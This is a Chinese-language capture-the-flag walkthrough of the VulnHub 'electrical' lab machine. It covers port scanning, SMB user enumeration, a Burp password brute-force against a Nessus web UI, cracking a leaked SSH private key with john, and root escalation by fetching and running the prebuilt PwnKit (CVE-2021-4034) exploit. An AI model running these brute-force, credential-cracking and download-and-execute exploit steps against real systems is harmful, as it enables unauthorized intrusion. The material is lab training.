vulnhub靶场之【digitalworld.local系列】的electrical靶机

admin 2025年3月11日09:39:05评论9 views字数 3655阅读12分11秒阅读模式

前言

靶机:digitalworld.local-electrical,IP地址为192.168.10.12,后期因为卡顿,重新安装,ip地址后面为192.168.10.11

攻击:kali,IP地址为192.168.10.6

kali采用VMware虚拟机,靶机选择使用VMware打开文件,都选择桥接网络

这里官方给的有两种方式,一是直接使用virtualbox加载,另一种是通过VMware直接加载,也给出了iso镜像文件。

文章中涉及的靶机,来源于vulnhub官网,想要下载,可自行访问官网下载,或者在本公众号回复 digital获取下载链接,链接地址: https://pan.quark.cn/s/86cf8a398835

主机发现

使用arp-scan -lnetdiscover -r 192.168.10.1/24扫描

也可以使用nmap等工具进行

vulnhub靶场之【digitalworld.local系列】的electrical靶机

信息收集

使用nmap扫描端口

扫描tcp端口,并保存于nmap-tcp

nmap -sT 192.168.10.12 --min-rate=1000 -p- -oA nmap-tcp
vulnhub靶场之【digitalworld.local系列】的electrical靶机

扫描常见的20个udp端口,不过这里的端口大部分都是不确定的情况

nmap -sU 192.168.10.12 --top-ports 20 -T4 -oA nmap-udp
vulnhub靶场之【digitalworld.local系列】的electrical靶机

把前面扫描出的tcp、udp端口,进行处理,只取端口号

grep open nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','#这里就是包括可能开放的端口都不要,因为是靶机,可能过滤的话,也会无法进一步扫描ports=22,80,8080,68,69,138,161,631,1434,1900
vulnhub靶场之【digitalworld.local系列】的electrical靶机

对特定的端口号进行深入探测

nmap -sV -O -sC -sT 192.168.10.12 -p $ports -oA detail
vulnhub靶场之【digitalworld.local系列】的electrical靶机
vulnhub靶场之【digitalworld.local系列】的electrical靶机
vulnhub靶场之【digitalworld.local系列】的electrical靶机

使用脚本检测有无漏洞

nmap --script=vuln 192.168.10.12 -p $ports -oA vuln
vulnhub靶场之【digitalworld.local系列】的electrical靶机

SMB探测

使用enum4linux尝试进行枚举,发现两个分享print$IPC$,并还有两个用户govindasamyelectrical

vulnhub靶场之【digitalworld.local系列】的electrical靶机
10

8834端口探测

这里需要注意,使用浏览器访问时需要加上https协议

https://192.168.10.12:8834
vulnhub靶场之【digitalworld.local系列】的electrical靶机

查看页面源代码也没有信息泄露,那么尝试识别一下,使用whatweb测试

vulnhub靶场之【digitalworld.local系列】的electrical靶机

再使用浏览器插件wappalyzer识别

vulnhub靶场之【digitalworld.local系列】的electrical靶机

尝试进行目录爆破,可以使用dirbdirsearch进行测试

dirsearch -u https://192.168.10.12:8834 -x 403,404 -e js,txt,zip,bak,cfm,dbm
vulnhub靶场之【digitalworld.local系列】的electrical靶机

发现有api,访问之后,发现有很多功能

vulnhub靶场之【digitalworld.local系列】的electrical靶机

测试这些api功能后,基本上都是需要登录的,无意义

网站密码爆破

尝试进行抓取数据包然后爆破,以前面两个用户名为测试,我这里是使用burp

选择攻击点、攻击模式、以及字典的选择

vulnhub靶场之【digitalworld.local系列】的electrical靶机

这里的默认字典,只有burp pro版本中有,若使用社区版,可以加载密码字典,比如加载kali中的/usr/share/wordlists/fasttrack.txt字典或rockyou.txt也行

vulnhub靶场之【digitalworld.local系列】的electrical靶机

开始攻击后,等一会即可发现成功获取一个,用户名govindasamy和弱密码password

vulnhub靶场之【digitalworld.local系列】的electrical靶机

敏感信息泄露

下面的靶机因为重装,ip地址更改为192.168.10.11

输入密码进行登录,登录后发现是nessus的漏洞扫描的web界面,之前也搜索过对应版本的nessus漏洞,发现并没有可利用的,那么在这个web ui界面进行探测。

vulnhub靶场之【digitalworld.local系列】的electrical靶机

这里建议使用burp抓取全程的数据包

在测试scan中的credentialed check时,点击其配置configuration,发现一个文本域,向下居然有内容,并且还是某一个的私钥,这个可能是靶机上的,也只是可能,需要进一步测试

vulnhub靶场之【digitalworld.local系列】的electrical靶机

把这个内容复制并保存在kali中的一个文件中

并且在配置中,默认的账户就是electrical

vulnhub靶场之【digitalworld.local系列】的electrical靶机

尝试进行登录可以明显的看到,对私钥进行了加密操作

chmod 600 id1ssh [email protected] -p 22222 -i id1
vulnhub靶场之【digitalworld.local系列】的electrical靶机

这里先使用john进行破解测试

ssh2john id1 > hashjohn hash --wordlist=/usr/share/wordlists/rockyou.txt
vulnhub靶场之【digitalworld.local系列】的electrical靶机

可以看到密码就是用户名,啧,之前好像在哪里看到过,好像在burp抓包的时候与发现ssh私钥的同一界面,不过无所谓了

靶机内信息收集

使用ssh进行登录

vulnhub靶场之【digitalworld.local系列】的electrical靶机

查看local.txt文件

vulnhub靶场之【digitalworld.local系列】的electrical靶机

查看当前靶机内有哪些用户

ls -al /homecat /etc/passwd | grep /bin/bash
vulnhub靶场之【digitalworld.local系列】的electrical靶机

查看网络状态连接

ss -antulpnetstat -antulp
vulnhub靶场之【digitalworld.local系列】的electrical靶机

查看ip地址状态

ip add
vulnhub靶场之【digitalworld.local系列】的electrical靶机

查看系统进程

ps aux | grep roottop
vulnhub靶场之【digitalworld.local系列】的electrical靶机

使用find寻找具有SUID权限的文件

find / -perm -u=s -type f 2>/dev/null
vulnhub靶场之【digitalworld.local系列】的electrical靶机

发现有sudo,但是这里不知道electrical的密码,测试后,发现果然需要密码,所以暂时搁置

查看内核版本及系统版本

uname -auname -r cat /etc/issuecat /etc/*releaselsb_release
vulnhub靶场之【digitalworld.local系列】的electrical靶机

查看定时任务

crontab -lcat /etc/crontabatq
vulnhub靶场之【digitalworld.local系列】的electrical靶机

注意,下面的脚本上传,都是我个人kali的路径,所以要自行更改的,并且下面的脚本都是在github上的项目,可自行去搜索下载。当然为了自己方便,我会放置在自己的网盘中的

通过scp上传pspy64检测是否有隐藏的任务

#在kali上执行该命令,通过scp传输scp -P 22222 -i ../digital/electrical/id1 pspy64 [email protected]:/tmp

不过在靶机上执行pspy64后,并未有什么发现

那么再上传一个脚本linpeas.sh,用于检测

#在kali上执行该命令,通过scp传输scp -P 22222 -i ../digital/electrical/id1 linpeas.sh [email protected]:/tmp

检测后,也是没有任何收获,不过还是看到一些东西,如第三方工具gcc等,并没有安装,也就表示无法在靶机内编译文件,也看到了可能存在的漏洞

vulnhub靶场之【digitalworld.local系列】的electrical靶机

提权

之前经过使用find寻找具有SUID权限文件时,发现有/usr/libexec/polkit-agent-helper-1/usr/bin/pkexec,结合前面的pwnkit漏洞的发现,也就是CVE-2021-4034,猜测也许可以利用

通过AI搜索,以下为内容

CVE-2021-4034(PwnKit)漏洞:

主要利用了具有 SUID 权限的 /usr/bin/pkexec 文件来实现提权

pkexec 是 PolicyKit 提供的一个工具,用于以特权用户(通常是 root)身份执行命令。

PolicyKit 是一个用于在 Linux 系统上管理特权操作的框架,pkexec 本身被设计为一个安全机制,用于在用户请求执行特权操作时进行权限验证。

下面是github中的一些poc,因为这里无法直接在靶机编译,所以使用编译好的文件,github项目地址为https://github.com/ly4k/PwnKit

采用这个编译好的

vulnhub靶场之【digitalworld.local系列】的electrical靶机

首先下载到kali中,然后通过scp下载到靶机内

#下载curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit#传输scp -P 22222 -i /id1 PwnKit [email protected]:/tmp

然后在靶机上加上执行权限后直接执行

chmod +x PwnKit./PwnKit
vulnhub靶场之【digitalworld.local系列】的electrical靶机

提权成功,查看/root目录下的文件

vulnhub靶场之【digitalworld.local系列】的electrical靶机

总结

该靶机的考察如下:

  1. 对于不存在漏洞的网站,并且需要登录才能看到内容,而且不支持注册的网站,或许爆破是最好的手段了,这里的爆破不仅仅包括密码爆破
  2. 存在smb服务的,都可以枚举一下用户,这个会有用处的
  3. 对于网站中的信息,也就是每一个模块,最好就是通过burp抓取数据包,至少要有历史记录,这样复盘很轻松。且网站中可能存在的隐藏信息,不一定通过页面源代码就能看到,建议使用浏览器的开发者工具,这里就是通过发现了一个私钥文件,才有下一步的
  4. ssh的私钥文件,对于设置密码的,可以通过john套件进行处理,ssh2john转换,john破解
  5. 对于提权,这里借助的是几个脚本pspy64、linpeas.sh发现的,当然还是配合find寻找到的SUID权限文件结合起来的。
  6. 考察pwnkit提权,也就是cve-2021-4034,这个可以通过github下载

原文始发于微信公众号(泷羽sec-何生安全):vulnhub靶场之【digitalworld.local系列】的electrical靶机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月11日09:39:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub靶场之【digitalworld.local系列】的electrical靶机https://cn-sec.com/archives/3826755.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息